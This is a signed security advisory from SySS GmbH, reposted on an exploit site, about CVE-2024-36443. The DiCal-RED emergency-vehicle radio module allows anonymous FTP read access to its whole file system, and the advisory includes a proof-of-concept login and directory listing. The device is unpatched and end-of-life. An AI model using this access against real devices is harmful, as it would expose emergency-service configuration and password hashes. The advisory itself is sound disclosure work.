Share
## https://sploitus.com/exploit?id=PACKETSTORM:180351
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Advisory ID: SYSS-2024-036  
Product: DiCal-RED  
Manufacturer: Swissphone Wireless AG  
Affected Version(s): Unknown  
Tested Version(s): 4009  
Vulnerability Type: Missing Authentication for Critical Function (CWE-306)  
Risk Level: High  
Solution Status: Open  
Manufacturer Notification: 2024-04-16  
Solution Date: None  
Public Disclosure: 2024-08-20  
CVE Reference: CVE-2024-36443  
Author of Advisory: Sebastian Hamann, SySS GmbH  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Overview:  
  
DiCal-RED is a radio module for communication between emergency vehicles and  
control rooms. It provides Ethernet, Wi-Fi and cellular network connectivity  
and runs a Linux- and BusyBox-based operating system.  
  
The manufacturer describes the product as follows (see [1]):  
  
"The DiCal-Red radio data module reliably guides you to your destination. This  
is ensured by the linking of navigation (also for the transmission of position  
data) and various radio modules."  
  
Due to anonymous FTP access, the device is vulnerable to the disclosure of  
sensitive information, such as the device password's hash.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerability Details:  
  
The device provides an FTP service on TCP port 21. This service allows  
anonymous access, i.e. logging in as the user "anonymous" with an arbitrary  
password. Anonymous users get read access to the whole file system of the  
device, including files that contain sensitive configuration information, such  
as /etc/deviceconfig.  
The respective process on the system runs as the system user "ftp". Therefore,  
a few files with restrictive permissions are not accessible via FTP.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Proof of Concept (PoC):  
  
$ ftp <IP or hostname>  
220 ProFTPD 1.3.3g Server (ProFTPD) [192.0.2.1]  
500 OPTS UTF8 not understood  
User (<IP or hostname>:(none)): anonymous  
331 Anonymous login ok, send your complete email address as your password  
Password:  
230 Anonymous access granted, restrictions apply  
ftp> ls  
200 PORT command successful  
150 Opening ASCII mode data connection for file list  
usb2  
mnt  
etc  
dev  
proc  
lib  
home  
htdocs  
sbin  
media  
ram  
linuxrc  
root  
gprscfg  
run  
usr  
usb1  
lost+found  
bin  
tmp  
sys  
var  
226 Transfer complete  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Solution:  
  
The manufacturer recommends not running the device in an untrusted network.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclosure Timeline:  
  
2024-02-29: Vulnerability discovered  
2024-04-16: Vulnerability reported to manufacturer  
2024-05-10: Manufacturer states that the vulnerability will not be fixed  
2024-05-14: Vulnerability reported to CERT-Bund  
2024-08-13: CERT-Bund informs us that the vendor declared the product EOL  
2024-08-20: Public disclosure of vulnerability  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
References:  
  
[1] Product website for DiCal-RED  
https://www.swissphone.com/solutions/components/terminals/radio-data-module-dical-red/  
[2] SySS Security Advisory SYSS-2024-036  
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-036.txt  
[3] SySS Responsible Disclosure Policy  
https://www.syss.de/en/responsible-disclosure-policy  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Credits:  
  
This security vulnerability was found by Sebastian Hamann of SySS GmbH.  
  
E-Mail: sebastian.hamann@syss.de  
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc  
Key ID: 0x9CE0E440429D8B96  
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Disclaimer:  
  
The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS website.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Copyright:  
  
Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEE9kPfIWLEfFN9souhnODkQEKdi5YFAmbEQgMACgkQnODkQEKd  
i5bypA/8CtRcEEdS48fPfKJRheIMG5qdEBv3Rq8rljg+PqkoqeL6G6ztRYQkbcaX  
Tl1+ajtOW3rPM9i9AExV6UIPG9IO+IY0v4vto1uHALZ7gkVeOe0bQXov0Lgbwr/y  
dWrpv4tMFNo48pDZEU9bl1+fb6VtPoiF2QPyjvylpiMe1ONrUpxqkd5HsNkAw2V7  
90X+Ma/+awXITwwTL/7iX6ryCvSZjN72wd1m1S9tcrQ0+/dUnoIZCDWNnLMSroUq  
GoqxotzUD0ehDxSrKUG4eXY1yGjJcIRSjAspYfNCdOnzHmW3XgrgCkFoDHnB8RTv  
bhL+uwxu99eQMkyrhPBZ34hGmRjIDpywbnrG6iX3+1pBiIslQQ/u3BYDdpYx3MJE  
Rv0HX+qrHQxPFphb+ZvPO/LHJApwgmjvS81OutAnbAblOnBpapjcBN729Sd5B0Sn  
x+MdUZOGQGEPKCXkBnHh7Dpt4zUlM8lmFALNhk2dW+eioZhC3RaYXc8GmcB7QyFo  
OjyCcsP1yMjN2ITfw1Jg2NfPQ/o05RoWRAxa/zDepW4T4wDGguTyZCNdxsHAH3bV  
2BtVF+jLOBhlf3/63RCzrRbiOIwKv6qkjjp5ymWwuALFaklpcjzFbx1Rwv9cl0Wy  
8wbJBa6BgJOcAO0ODR+GyPCn79ZhvY6w9SqmXM9rWcVQb3Rz1Yk=  
=lCcl  
-----END PGP SIGNATURE-----